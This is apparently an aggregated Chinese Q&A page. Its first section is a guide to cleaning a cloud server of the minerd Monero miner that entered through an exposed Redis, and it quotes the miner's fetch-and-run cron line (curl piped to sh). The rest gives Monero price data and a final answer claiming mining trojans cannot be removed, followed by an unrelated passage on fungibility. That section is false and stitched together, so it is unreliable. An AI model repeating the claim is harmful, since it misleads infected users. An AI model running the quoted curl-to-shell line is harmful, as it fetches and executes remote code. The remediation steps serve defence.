本文目录一览：

• 1、阿里云服务器被挖矿了怎么办？(纯纯电脑小白
• 2、门罗币现状
• 3、门罗币类的挖矿 木马能查杀吗？

阿里云服务器被挖矿了怎么办？(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

门罗币现状

根据行情数据显示，门罗币价值116.1美元，相当于人民币768.15元，历史更高价格为495.83美元，相当于人民币3280.56元，历史更低价格为0.2129美元，相当于人民币1.4086元。2016年门罗币更高价格14.0944美元，2017年门罗币更高价格469.19美元，2018年门罗币更高价格459.33美元，2019年门罗币更高价格117.41美元，2020年门罗币更高价格135.8美元。

XMR门罗币，匿名三剑客之一，继大饼之后的暗网之王。独创的环形签名技术曾独步币圈无人能及(现在有了更强大的零知识证明技术)。在大多数项目都在支持ASIC矿机或保持中立不同，其项目团队从一开始就是非常抵触ASIC矿机挖矿，甚至不惜多次硬分叉来对抗ASIC矿机，结果就是分裂出多个分叉币，并计划于今年10月部署新的RandomX”算法来继续对抗 ASIC矿机。可以说是现在比较少的算力去中心化的项目了。但是缺点是由于可以通过cpu挖矿，导致门罗币非常受到黑客的喜爱，经常会出现病毒劫持电脑给黑客挖矿的事件，也算是有利就有弊吧。

门罗币类的挖矿 木马能查杀吗？

不能的

门罗币通过自动将保密技术应用到每一笔交易来解决这些隐私问题。你可以放心你不可能拥有“受污染”的门罗币。这是一个经济学概念，称为“可互换性”，在历史上被认为是所有货币的一个重要特征